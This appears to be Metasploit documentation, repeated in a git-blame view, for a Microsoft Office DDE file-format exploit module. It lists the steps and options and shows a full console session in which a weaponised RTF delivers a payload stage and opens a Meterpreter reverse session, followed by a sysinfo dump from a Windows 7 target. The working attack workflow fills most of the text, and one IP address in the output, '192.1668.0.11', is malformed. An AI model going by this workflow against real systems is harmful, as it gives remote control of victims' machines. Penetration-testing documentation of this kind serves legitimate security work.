documentation/modules/exploit/windows/fileformat/office_dde_delivery.md

Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.

## Vulnerable Application
All Microsoft Office versions

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/windows/fileformat/office_dde_delivery`
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`

## Options
### FILENAME
Filename to output, whether injecting or generating a blank one

### INJECT_PATH
Path to filename to inject


## Example

```
msf > use exploit/windows/fileformat/office_dde_delivery
msf exploit(office_dde_delivery) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_dde_delivery) > set LHOST ens3
LHOST => ens3
msf exploit(office_dde_delivery) > set LPORT 35116
LPORT => 35116
msf exploit(office_dde_delivery) > run
[*] Using URL: http://0.0.0.0:8080/DGADAcDZ
[*] Local IP: http://192.1668.0.11:8080/DGADAcDZ
[*] Server started.
[*] Handling request for .sct from 192.168.0.24
[*] Delivering payload to 192.168.0.24...
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```
MS Office DDE Documentation 2017-12-06 21:46:47 -05:00			`Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.`

			`## Vulnerable Application`
			`All Microsoft Office versions`

			`## Verification Steps`

			`1. Start msfconsole`
			2. Do: `use exploit/windows/fileformat/office_dde_delivery`
			3. Do: `set PAYLOAD [PAYLOAD]`
			4. Do: `run`

			`## Options`
			`### FILENAME`
docs on options 2017-12-07 14:47:40 -05:00			`Filename to output, whether injecting or generating a blank one`
MS Office DDE Documentation 2017-12-06 21:46:47 -05:00
docs on options 2017-12-07 14:47:40 -05:00			`### INJECT_PATH`
MS Office DDE Documentation 2017-12-06 21:46:47 -05:00			`Path to filename to inject`


			`## Example`

			```
			`msf > use exploit/windows/fileformat/office_dde_delivery`
			`msf exploit(office_dde_delivery) > set FILENAME msf.rtf`
			`FILENAME => /home/mumbai/file.rtf`
			`msf exploit(office_dde_delivery) > set LHOST ens3`
			`LHOST => ens3`
			`msf exploit(office_dde_delivery) > set LPORT 35116`
			`LPORT => 35116`
			`msf exploit(office_dde_delivery) > run`
			`[*] Using URL: http://0.0.0.0:8080/DGADAcDZ`
			`[*] Local IP: http://192.1668.0.11:8080/DGADAcDZ`
			`[*] Server started.`
			`[*] Handling request for .sct from 192.168.0.24`
			`[*] Delivering payload to 192.168.0.24...`
			`[*] Sending stage (205379 bytes) to 192.168.0.24`
			`[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)`

			`meterpreter > sysinfo`
			`Computer : TEST-PC`
			`OS : Windows 7 (Build 7601, Service Pack 1).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 1`
			`Meterpreter : x64/windows`
			`meterpreter >`
			```